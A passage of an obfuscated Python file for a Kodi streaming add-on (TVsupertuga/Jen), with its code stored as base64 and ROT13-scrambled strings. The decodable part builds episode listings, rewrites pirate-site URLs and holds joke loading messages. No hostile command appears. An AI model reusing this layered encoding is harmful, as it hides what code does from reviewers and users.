OaVvjXVPNtVPNtVPNtVPNtVPNtVTWup2IsqTuyoJIsqKWfVPftVzgcMUZin2yxpmLhnaOaVvjXVPNtVPNtVPNtVPNtKFjXVPNtVPNtVPNtVPNtW21iqzyyplp6VSfXVPNtVPNtVPNtVPNtVPNtVTWup2IsqTuyoJIsqKWfVPftVz1iqzyypl9go3McMKZkYzcjMlVfPvNtVPNtVPNtVPNtVPNtVPOvLKAyK3EbMJ1yK3IloPNeVPWgo3McMKZioJ92nJImZv5dpTpvYNbtVPNtVPNtVPNtVPNtVPNtLzSmMI90nTIgMI91pzjtXlNvoJ92nJImY21iqzyypmZhnaOaVvjXVPNtVPNtVPNtVPNtVPNtVTWup2IsqTuyoJIsqKWfVPftVz1iqzyypl9go3McMKZ0YzcjMlVfPvNtVPNtVPNtVPNtVPNtVPOvLKAyK3EbMJ1yK3IloPNeVPWgo3McMKZioJ92nJImAF5dpTpvYNbtVPNtVPNtVPNtVPNtVPNtLzSmMI90nTIgMI91pzjtXlNvoJ92nJImY21iqzyypmLhnaOaVvjXVPNtVPNtVPNtVPNtVPNtVTWup2IsqTuyoJIsqKWfVPftVz1iqzyypl9go3McMKZ3YzcjMlVfPvNtVPNtVPNtVPNtVPNtVPOvLKAyK3EbMJ1yK3IloPNeVPWgo3McMKZioJ92nJImBP5dpTpvYNbtVPNtVPNtVPNtVPNtVPNtLzSmMI90nTIgMI91pzjtXlNvoJ92nJImY21iqzyypmxhnaOaVvjXVPNtVPNtVPNtVPNtVPNtVTWup2IsqTuyoJIsqKWfVPftVz1iqzyypl9go3McMKZkZP5dpTpvYNbtVPNtVPNtVPNtVPNtVPNtLzSmMI90nTIgMI91pzjtXlNvoJ92nJImY21iqzyypmRkYzcjMlVfPvNtVPNtVPNtVPNtVPNtVPOvLKAyK3EbMJ1yK3IloPNeVPWgo3McMKZioJ92nJImZGVhnaOaVvjXVPNtVPNtVPNtVPNtKFjXVPNtVPNtVPNtVPNtW3AjLJAyWmbtJjbtVPNtVPNtVPNtVPNtVPNtLzSmMI90nTIgMI91pzjtXlNvp3OuL2Hip3OuL2HkYzcjMlVfPvNtVPNtVPNtVPNtVPNtVPOvLKAyK3EbMJ1yK3IloPNeVPWmpTSwMF9mpTSwMGVhnaOaVvjXVPNtVPNtVPNtVPNtVPNtVTWup2IsqTuyoJIsqKWfVPftVaAjLJAyY3AjLJAyZl5dpTpvYNbtVPNtVPNtVPNtVPNtVPNtLzSmMI90nTIgMI91pzjtXlNvp3OuL2Hip3OuL2H0YzcjMlVfPvNtVPNtVPNtVPNtVPNtVPOvLKAyK3EbMJ1yK3IloPNeVPWmpTSwMF9mpTSwMGHhnaOaVvjXVPNtVPNtVPNtVPNtVPNtVTWup2IsqTuyoJIsqKWfVPftVaAjLJAyY3AjLJAyAv5dpTpvYNbtVPNtVPNtVPNtVPNtVPNtLzSmMI90nTIgMI91pzjtXlNvp3OuL2Hip3OuL2H3YzcjMlVfPvNtVPNtVPNtVPNtVS0fPvNtVPNtVPNtVPNtVPqanJLtoTyzMFp6VSfXVPNtVPNtVPNtVPNtVPNtVTWup2IsqTuyoJIsqKWfVPftVzqcMzkcMzHiL2y0rF5anJLvYNbtVPNtVPNtVPNtVPNtVPNtLzSmMI90nTIgMI91pzjtXlNvM2yzoTyzMF9yqyIDoHp2WGVjYFHlZRygM3IlYzqcMvVfPvNtVPNtVPNtVPNtVPNtVPOvLKAyK3EbMJ1yK3IloPNeVPWanJMfnJMyY25cM2u0WGVjoTyanUEmYzqcMvVfPvNtVPNtVPNtVPNtVPNtVPOvLKAyK3EbMJ1yK3IloPNeVPWanJMfnJMyY3AjnJ5hnJ5aWGVjq29ioP5anJLvYNbtVPNtVPNtVPNtVPOqYNbtVPNtVPNtVPNtVPNaM2yzVT5uqUIlMFp6VSfXVPNtVPNtVPNtVPNtVPNtVTWup2IsqTuyoJIsqKWfVPftVzqcMz5uqUIlMF9zLJkfpl5anJLvYNbtVPNtVPNtVPNtVPNtVPNtLzSmMI90nTIgMI91pzjtXlNvM2yzozS0qKWyY2ywMJkuozDhM2yzVvjXVPNtVPNtVPNtVPNtVPNtVTWup2IsqTuyoJIsqKWfVPftVzqcMz5uqUIlMF9eo3WyLFHlZTqupzEyov5anJLvYNbtVPNtVPNtVPNtVPNtVPNtLzSmMI90nTIgMI91pzjtXlNvM2yzozS0qKWyY3AerFHlZUquqzImYzqcMvVfPvNtVPNtVPNtVPNtVS0fPvNtVPNtVPNtsDbtVPNtVPNtVUWyqUIlovO0nTIgMI9fnKA0PtbtVPNtMTIzVTEcp3OfLKysoTymqPumMJkzYPOcqTIgpljtL29hqTIhqS90rKOyXGbXVPNtVPNtVPOcMvOwo250MJ50K3E5pTHtCG0tVaAyLKAioaZvBtbtVPNtVPNtVPNtVPOwo250MKu0K2y0MJ1mVQ0tJ10XVPNtVPNtVPNtVPNtnJLtDHERG04hM2I0H2I0qTyhMltvp2I0qTyhM3AsL29hqTI4qPVcVQ09VPW0paIyVwbXVPNtVPNtVPNtVPNtVPNtVTAioaEyrUEsnKEyoKZhLKOjMJ5xXNbtVPNtVPNtVPNtVPNtVPNtVPNtVPusXPWGMKE0nJ5aplVcYNbtVPNtVPNtVPNtVPNtVPNtVPNtVPNvHaIhHTk1M2yhXUfjsFxvYzMipz1uqPuaMKEsLJExo25sqKWfXPWGMKE0nJ5aplVcXFxcPvNtVP'
god = 'AgICAgICAgIHVybCA9IFtdCiAgICAgICAgICAgIGZvciBpdGVtIGluIGl0ZW1zOgogICAgICAgICAgICAgICAgdXJsLmFwcGVuZChpdGVtWyJ1cmwiXSkKICAgICAgICAgICAga29kaW5nLkFkZF9EaXIoCiAgICAgICAgICAgICAgICBuYW1lPV8oIkFsbCBFcGlzb2RlcyIpLAogICAgICAgICAgICAgICAgdXJsPXBpY2tsZS5kdW1wcyh1cmwpLAogICAgICAgICAgICAgICAgbW9kZT0iYWxsX2VwaXNvZGVzIiwKICAgICAgICAgICAgICAgIGZvbGRlcj1UcnVlLAogICAgICAgICAgICAgICAgaWNvbj1BRERPTi5nZXRBZGRvbkluZm8oImljb24iKSwKICAgICAgICAgICAgICAgIGZhbmFydD1BRERPTi5nZXRBZGRvbkluZm8oImZhbmFydCIpLAogICAgICAgICAgICAgICAgY29udGV4dF9pdGVtcz1jb250ZXh0X2l0ZW1zLAogICAgICAgICAgICAgICAgY29udGVudF90eXBlPSJ2aWRlbyIpCgogICAgICAgIGZvciBpdGVtIGluIGl0ZW1zOgogICAgICAgICAgICBjb250ZXh0X2l0ZW1zID0gW10KICAgICAgICAgICAgaWYgQURET04uZ2V0U2V0dGluZygic2V0dGluZ3NfY29udGV4dCIpID09ICJ0cnVlIjoKICAgICAgICAgICAgICAgIGNvbnRleHRfaXRlbXMuYXBwZW5kKAogICAgICAgICAgICAgICAgICAgIChfKCJTZXR0aW5ncyIpLAogICAgICAgICAgICAgICAgICAgICAiUnVuUGx1Z2luKHswfSkiLmZvcm1hdChnZXRfYWRkb25fdXJsKCJTZXR0aW5ncyIpKSkpCiAgICAgICAgICAgIGNvbnRleHRfaXRlbXMuZXh0ZW5kKGl0ZW1bImNvbnRleHQiXSkKICAgICAgICAgICAga29kaW5nLkFkZF9EaXIoCiAgICAgICAgICAgICAgICBuYW1lPWl0ZW1bImxhYmVsIl0sCiAgICAgICAgICAgICAgICB1cmw9aXRlbVsidXJsIl0sCiAgICAgICAgICAgICAgICBtb2RlPWl0ZW1bIm1vZGUiXSwKICAgICAgICAgICAgICAgIGZvbGRlcj1pdGVtWyJmb2xkZXIiXSwKICAgICAgICAgICAgICAgIGljb249aXRlbVsiaWNvbiJdLAogICAgICAgICAgICAgICAgZmFuYXJ0PWl0ZW1bImZhbmFydCJdLAogICAgICAgICAgICAgICAgY29udGV4dF9pdGVtcz1jb250ZXh0X2l0ZW1zLAogICAgICAgICAgICAgICAgY29udGVudF90eXBlPSJ2aWRlbyIsCiAgICAgICAgICAgICAgICBpbmZvX2xhYmVscz1pdGVtWyJpbmZvIl0sCiAgICAgICAgICAgICAgICBzZXRfcHJvcGVydHk9aXRlbS5nZXQoInByb3BlcnRpZXMiLCB7fSksCiAgICAgICAgICAgICAgICBzZXRfYXJ0PXsicG9zdGVyIjogaXRlbVsiaWNvbiJdfSkKICAgICAgICB4Ym1jcGx1Z2luLnNldENvbnRlbnQoaW50KHN5cy5hcmd2WzFdKSwgY29udGVudF90eXBlKQogICAgICAgIHJldHVybiBUcnVlCgogICAgZGVmIHJlcGxhY2VfdXJsKHNlbGYsIHVybCk6CiAgICAgICAgaWYgJ25vcmVzdHJpY3Rpb25zLm5vb2JzYW5kbmVyZHMuY29tJyBpbiB1cmwgYW5kICdub3Jlc3RyaWN0aW9ucy5jbHViL25vcmVzdHJpY3Rpb25zLmNsdWInIG5vdCBpbiB1cmw6CiAgICAgICAgICAgIHVybCA9IHVybC5yZXBsYWNlKCdub3Jlc3RyaWN0aW9ucy5ub29ic2FuZG5lcmRzLmNvbScsCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIF9fYnVpbHRpbl9fLkJPQl9CQVNFX0RPTUFJTikKICAgICAgICBlbGlmICd3d3cubm9yZXN0cmljdGlvbnMuY2x1YicgaW4gdXJsIGFuZCAnd3d3Lm5vcmVzdHJpY3Rpb25zLmNsdWIvbm9yZXN0cmljdGlvbnMuY2x1Yicgbm90IGluIHVybCBhbmQgJ25vcmVzdHJpY3Rpb25zLmNsdWIvbm9yZXN0cmljdGlvbnMuY2x1Yicgbm90IGluIHVybDoKICAgICAgICAgICAgdXJsID0gdXJsLnJlcGxhY2UoJ3d3dy5ub3Jlc3RyaWN0aW9ucy5jbHViJywKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgX19idWlsdGluX18uQk9CX0JBU0VfRE9NQUlOKQogICAgICAgIGVsaWYgJ3d3dy5ub3Jlc3RyaWN0aW9ucy5jbHViL25vcmVzdHJpY3Rpb25zLmNsdWInIGluIHVybDoKICAgICAgICAgICAgdXJsID0gdXJsLnJlcGxhY2UoJ3d3dy5ub3Jlc3RyaWN0aW9ucy5jbHViL25vcmVzdHJpY3Rpb25zLmNsdWInLAogICAgICAgICAgICAgICAgICAgICAgICAgICAgICBfX2J1aWx0aW5fXy5CT0JfQkFTRV9ET01BSU4pCiAgICAgICAgZWxpZiAnbm9yZXN0cmljdGlvbnMuY2x1YicgaW4gdXJsIGFuZCAnbm9yZXN0cmljdGlvbnMuY2x1Yi9ub3Jlc3RyaWN0aW9ucy5jbHViJyBub3QgaW4gdXJsOgogICAgICAgICAgICB1cmwgPSB1cmwucmVwbGFjZSgnbm9yZXN0cmljdGlvbnMuY2x1YicsCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIF9fYnVpbHRpbl9fLkJPQl9CQVNFX0RPTUFJTikKICAgICAgICBlbGlmICdub3Jlc3RyaWN0aW9ucy5jbHViL25vcmVzdHJpY3Rpb25zLmNsdWInIGluIHVybDoKICAgICAgICAgICAgdXJsID0gdXJsLnJlcGxhY2UoJ25vcmVzdHJpY3Rpb25zLmNsdWIvbm9yZXN0cmljdGlvbnMuY2x1YicsCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIF9fYnVpbHRpbl9fLkJPQl9CQVNFX0RPTUFJTikKICAgICAgICByZXR1cm4gdXJsCgogICAgZGVmIGdldF9saW5rX21lc3NhZ2Uoc2VsZiwgKmFyZ3MpOgogICAgICAgIG1lc3NhZ2VzID0gWwogICAgICAgICAgICB7CiAgICAgICAgICAgICAgICAnSEQnOiAnU2UgZGlzcG9uw612ZScsCiAgICAgICAgICAgICAgICAnU0QnOiAnT2JyYXMgbWFpcyBwcm92w6F2ZWlzJwogICAgICAgICAgICB9LAogICAgICAgICAgICB7CiAgICAgICAgICAgICAgICAnSEQnOiAnSmVuIMOpIFlhIENvdXNpbicsCiAgICAgICAgICAgICAgICAnU0QnOiAnSmVuIG7Do28gw6kgWWEgQ291c2luJwogICAgICAgICAgICB9LAogICAgICAgICAgICB7CiAgICAgICAgICAgICAgICAnSEQnOiAnVmVyaWZpY2FuZG8gb3MgcHJpbmNpcGFpcyBzaXRlcycsCiAgICAgICAgICAgICAgICAnU0QnOiAnU2l0dGluZyBJbiBDaW5lbWEgUmVjb3JkaW5nJwogICAgICAgICAgICB9LAogICAgICAgICAgICB7CiAgICAgICAgICAgICAgICAnSEQnOgogICAgICAgICAgICAgICAgJ0Vzc2EgcXVhbGlkYWRlIGVzdMOhIHNlbmRvIHByb2N1cmFkYSBwZWxvcyBwcmluY2lwYWlzIGhvbWVucywgcXVlbT8gVG9wIC4uLi4gSG9tZW5zIScsCiAgICAgICAgICAgICAgICAnU0QnOgogICAgICAgICAgICAgICAgJ0VzdGEgcXVhbGlkYWRlIMOpIHZlbmRpZGEgbmEgZXNxdWluYSBwb3IgdW0gY2FyYSBzb21icmlvJwogICAgICAgICAgICB9LAogICAgICAgICAgICB7CiAgICAgICAgICAgICAgICAnSEQnOiAnR29vZ2xlIEZpYmVyJywKICAgICAgICAgICAgICAgICdTRCc6ICdFc3BlcmFuZG8gcG9yIGNvbmV4w6NvIGRpYWwtdXAnCiAgICAgICAgICAgIH0sCiAgICAgICAgICAgIHsKICAgICAgICAgICAgICAgICdIRCc6ICfDk3RpbW8hIFZhbGUgYSBwZW5hIGVzcGVyYXInLAogICAgICAgICAgICAgICAgJ1NEJzogJ0JvbSBvIGJhc3RhbnRlLiBFdSBzw7MgcXVlcm8gYXNzaXN0aXInCiAgICAgICAgICAgIH0sCiAgICAgICAgICAgIHsKICAgICAgICAgICAgICAgICdIRCc6ICdCbHVSYXkgUXVhbGlkYWRlJywKICAgICAgICAgICAgICAgICdTRCc6ICdWSFMgUXVhbGlkYWRlJwogICAgICAgICAgICB9LAogICAgICAgICAgICB7CiAgICAgICAgICAgICAgICAnSEQnOiAnMTA4MHAgJywKICAgICAgICAgICAgICAgICdTRCc6ICdCYWl4YScKICAgICAgICAgICAgfSwKICAgICAgICAgICAgewogICAgICAgICAgICAgICAgJ0hEJzogJ0V1IHByZWNpc28gdmVyIGVzc2UgZmlsbWUgbmEgbWFpcyBhbHRhIHF1YWxpZGFkZScsCiAgICAgICAgICAgICAgICAnU0QnOiAnQmFpeGEgcHJvdmF2ZWxtZW50ZSDDqSB1bWEgcG9yY2FyaWEsIGVudMOjbyB2YW1vcyBhcGVuYXMgYWNhYmFyIGNvbSBpc3NvJwogICAgICAgICAgICB9LAogICAgICAgICAgICB7CiAgICAgICAgICAgICAgICAnSEQnOiAnUGFyZWNlIHVtIE1hc2VyYXRpJywKICAgICAgICAgICAgICAgICdTRCc6ICcgUGFyZWNlIHVtIEZvcmQgRm9jdXMnCiAgICAgICAgICAgIH0sCiAgICAgICAgICAgIHsKICAgICAgICAgICAgICAgICdIRCc6ICdTdXBlcm1vZGVsbyBRdWFsaWRhZGUnLAogICAgICAgICAgICAgICAgJ1NEJzogJyBQYXJlY2UgYSB2b3bDsyBUaGVsbWEnCiAgICAgICAgICAgIH0sCiAgICAgICAgICAgIHsKICAgICAgICAgICAgICAgICdIRCc6ICdBUkInLAogICAgICAgICAgICAgICAgJ1NEJzogJ0FSRCcKICAgICAgICAgICAgfSwKICAgICAgICAgICAgewogICAgICAgICAgICAgICAgJ0hEJzogJ01lcmMgbyBwaW7DoWN1bG8gZG8gYnJpbGhvJywKICAgICAgICAgICAgICAgICdTRCc6ICdPIEpvaG4gSGFycmlzb24gZGUgcXVhbGlkYWRlJwogICAgICAgICAgICB9LAogICAgICAgIF0KCiAgICAgICAgaWYgeGJtY2FkZG9uLkFkZG9uKCkuZ2V0U2V0dGluZygnZW5hYmxlX29mZmVuc2l2ZScpID09ICd0cnVlJzoKICAgICAgICAgICAgbWVzc2FnZXMuZXh0ZW5kKFsKICAgICAgICAgICAgICAgIHsKICAgICAgICAgICAgICAgICAgICAnSEQnOiAnS2lja3MgQXNzISEnLAogICAgICAgICAgICAgICAgICAgICdTRCc6ICdHZXRzIGFzcyBraWNrZWQgcmVwZWF0ZWRseScKICAgICAgICAgICAgICAgIH0sCiAgICAgICAgICAgICAgICB7CiAgICAgICAgICAgICAgICAgICAgJ0hEJzogJ0Z1Y2tpbmcgUm9ja3MhIScsCiAgICAgICAgICAgICAgICAgICAgJ1NEJzogJ0Z1Y2tpbmcgU3Vja3MhIScKICAgICAgICAgICAgICAgIH0sCiAgICAgICAgICAgICAgICB7CiAgICAgICAgICAgICAgICAgICAgJ0hEJzogJ0JpZyBCb2RhY2lvdXMgQnJlYXN0cycsCiAgICAgICAgICAgICAgICAgICAgJ1NEJzogJ1NhZ2d5IE1pbGsgVGVhdHMnLAogICAgICAgICAgICAgICAgfSwKICAgICAgICAgICAgXSkKICAgICAgICByZXR1cm4gbWVzc2FnZXMKCiAgICBkZWYgZ2V0X3NlYXJjaGluZ19tZXNzYWdlKHNlbGYsIHByZXNldCk6CiAgICAgICAgbWVzc2FnZXMgPSBbCiAgICAgICAgICAgICcnLAogICAgICAgICAgICAnVFZzdXBlcnR1Z2FcJ2VzdGEgYXBlbmFzIG1vcmRlbmRvIHBhcmEgYmxvY2tidXN0ZXJzIG7Do28gc2Vyw6EgbWFpcyB1bSBzZWd1bmRvJywKICAgICAgICAgICAgJ1RWc3VwZXJ0dWdhIGFkb3JtZWNldSBkdXJhbnRlIGVzdGUgZmlsbWUnLAogICAgICAgICAgICAnVFZzdXBlcnR1Z2FcJ0NvbGVjYW8gZGUgZmlsbWVzIFRWc3VwZXJ0dWdhIG7Do28gdGVtIGxpbWl0ZXMnLAogICAgICAgICAgICAnUGVzcXVpc2FuZG8gbmEgSW50ZXJuZXQgcGFyYSBzdWEgc2VsZWNhbycsCiAgICAgICAgICAgICdUVnN1cGVydHVnYSB2aXUgbyBzZXUgZ29zdG8gZW0gZmlsbWVzIGUgZXN0YSBtdWl0byBkZXNhcG9udGFkbyAnLAogICAgICAgICAgICAnVFZzdXBlcnR1Z2EgYWNoYSBxdWUgZWxlIHRlbSBhcXVlbGUgRFZEIHBvciBhcXVpJywKICAgICAgICAgICAgJ1RWc3VwZXJ0dWdhIGRpeiBxdWUgdm9jw6ogZSB1bSBnZWVrIGRvIGNpbmVtYSBjb21vIGVsZScsCiAgICAgICAgICAgICdUVnN1cGVydHVnYSBkaXogc2FpciBkbyB0d2l0dGVyIGUgZGVzZnJ1dGFyIGRlIHNldSBhZGRvbicsCiAgICAgICAgICAgICdUVnN1cGVydHVnYSDDqSB1bSBhZGRvbiBwcm9jdXJhZG8gZW0gMTI1IHBhw61zZXMnLAogICAgICAgICAgICAnVFZzdXBlcnR1Z2EgZGlzc2UgcXVlIHNldSBnb3N0byBwb3IgZmlsbWVzIMOpIGRlIHByaW1laXJhIHF1YWxpZGFkZScsCiAgICAgICAgICAgICdRdWFuZG8gbyBUVnN1cGVydHVnYSBlc2NvbGhlIHVtIGZpbG1lLCBvcyBzZXJ2aWRvcmVzIHRyZW1lbSBkZSBtZWRvJywKICAgICAgICAgICAgJ0VsZXMgdGVtZW0gVFZzdXBlcnR1Z2EuIE7Do28gb3VjYSBvZGlhZG9yZXMnLAogICAgICAgICAgICAnVFZzdXBlcnR1Z2EgZGlzc2UgcXVlIGVsZSB0cmFiYWxoYSB0w6NvIGR1cm8gcGFyYSB2b2PDqiwgbyB1c3XDoXJpbyBmaW5hbCcsCiAgICAgICAgICAgICdUVnN1cGVydHVnYSBmYXogaXNzbyBwb3JxdWUgZWxlIGFtYSwgbsOjbyBwb3IgZ2Fuw6JuY2lhJywKICAgICAgICAgICAgJ0lzc28gbsOjbyDDqSBjcmFjayBkZSBUVnN1cGVydHVnYXMgYnV0dCwgw6kgc2V1IHRpdHVsYXIgcmVtb3RvJywKICAgICAgICAgICAgJ1RWc3VwZXJ0dWdhIC4uLiBFdSBzb3Ugc2V1IHBhaSAhIScsCiAgICAgICAgICAgICdFdSB2b3UgZmF6ZXIgdW1hIG9mZXJ0YSBhIFRWc3VwZXJ0dWdhIHF1ZSBlbGUgbsOjbyBwb2RlIHJlY3VzYXIuJywKICAgICAgICAgICAgJ0FxdWk'
destiny = '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tVPNtVPNtnJLtK19vqJyfqTyhK18hDx9PK0WOH0IsER9ADHyBVT5iqPOcovO1pzjtLJ5xVPWho3Wyp3ElnJA0nJ9hplVtoz90VTyhVUIloQbXVPNtVPNtVPNtVPNtpzI0qKWhVUWypKIyp3EmYzqyqPu1pzjcYzAioaEyoaDXVPNtVPNtVPO4oJksL2SwnTIsp3OyLlN9VUfXVPNtVPNtVPNtVPNtVzAioUIgoaZvBvO7PvNtVPNtVPNtVPNtVPNtVPNvqKWfVwbtVyESJSDvYNbtVPNtVPNtVPNtVPNtVPNtVaugoPV6VPWHEIuHVvjXVPNtVPNtVPNtVPNtVPNtVPWwLJAbMI90nJ1yVwbtVyESJSDvYNbtVPNtVPNtVPNtVPNtVPNtVzAlMJS0MJDvBvNvIRILIPVXVPNtVPNtVPNtVPNtsFjXVPNtVPNtVPNtVPNtVzAioaA0pzScoaEmVwbtrjbtVPNtVPNtVPNtVPNtVPNtVaIhnKS1MFV6VPW1pzjvPvNtVPNtVPNtVPNtVU0XVPNtVPNtVPO9PvNtVPNtVPNtn29xnJ5aYxAlMJS0MI9HLJWfMFtvrT1fK2AuL2uyVvjtrT1fK2AuL2uyK3AjMJZcPvNtVPNtVPNtnJLtoz90VTAuL2uyMQbXVPNtVPNtVPNtVPNtn29xnJ5aYzEioT9aXPW1ozAuL2uyMPOlMKS1MKA0MJDvXDbtVPNtVPNtVPNtVPOlMKAjo25mMFN9VUWypKIyp3EmYzqyqPu1pzjfVUMypzyzrG1TLJkmMFxXVPNtVPNtVPNtVPNtrT1fVQ0tpzImpT9hp2HhL29hqTIhqNbtVPNtVPNtVPNtVPOlMKAjo25mMF5woT9mMFtcPvNtVPNtVPNtMJkmMGbXVPNtVPNtVPNtVPNtoJS0L2ttCFOeo2EcozphE2I0K0Mlo21sITSvoTHbVaugoS9wLJAbMFVfVUfvqKWfVwbtqKWfsFxXVPNtVPNtVPNtVPNtnJLtoJS0L2t6PvNtVPNtVPNtVPNtVPNtVPOeo2EcozphMT9fo2pbVz1uqTAbBvNvVPftpzIjpvugLKEwnPxcPvNtVPNtVPNtVPNtVPNtVPOgLKEwnPN9VT1uqTAbJmOqPvNtVPNtVPNtVPNtVPNtVPOwpzIuqTIxK3EcoJHtCFOzoT9uqPugLKEwnSfvL3WyLKEyMPWqXDbtVPNtVPNtVPNtVPNtVPNtL2SwnTIsqTygMFN9VTyhqPugLKEwnSfvL2SwnTIsqTygMFWqXDbtVPNtVPNtVPNtVPNtVPNtn29xnJ5aYzEioT9aXPWyrUOcpzHtqTygMGbtVvNeVUWypUVbL3WyLKEyMS90nJ1yVPftL2SwnTIsqTygMFxcPvNtVPNtVPNtVPNtVPNtVPOeo2EcozphMT9fo2pbVzAlMJS0M